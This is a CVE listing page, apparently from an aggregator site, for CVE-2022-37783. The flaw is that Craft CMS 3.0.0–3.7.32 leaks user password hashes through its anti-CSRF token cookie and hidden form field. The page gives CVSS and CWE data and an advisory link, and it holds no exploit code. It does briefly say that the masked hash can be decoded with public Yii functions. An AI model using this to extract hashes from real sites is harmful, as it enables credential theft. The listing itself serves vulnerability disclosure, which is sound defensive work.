Exploit Report

Computer Security And Bug Information

CVE-2022-37783

CVECVE-2022-37783
CVE Ordinal Value243796
Published Date2022-12-05T21:15Z
Modified Date2022-12-07T04:52Z
CWE TypeCWE-311
CVSS 3.xCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
DescriptionAll Craft CMS versions between 3.0.0 and 3.7.32 disclose password hashes of users who authenticate using their E-Mail address or username in Anti-CSRF-Tokens. Craft CMS uses a cookie called CRAFT_CSRF_TOKEN and a HTML hidden field called CRAFT_CSRF_TOKEN to avoid Cross Site Request Forgery attacks. The CRAFT_CSRF_TOKEN cookie discloses the password hash in without encoding it whereas the corresponding HTML hidden field discloses the users' password hash in a masked manner, which can be decoded by using public functions of the YII framework.
References
By clicking these links you will leave this website. We do not endorse and will not be held accountable for any activity on external sites.
Reference URLhttps://at-trustit.tuv.at/tuev-trust-it-cves/cve-disclosure-of-password-hashes/
Reference DescriptionMISC https://at-trustit.tuv.at/tuev-trust-it-cves/cve-disclosure-of-password-hashes/
Reference Description
TagsExploit Third Party Advisory
Sources NIST MITRE

This site's data is aggregated programmatically and provided "as is" without any representations or warranties, express or implied. Exploit.report is not affiliated with the The MITRE Corporation, U.S. Department of Homeland Security (DHS), Cybersecurity and Infrastructure Security Agency (CISA), or US government in any way. CVE and the CVE logo are registered trademarks of The MITRE Corporation

© 2022 Exploit.Report | Data | Contact | Privacy Policy | Articles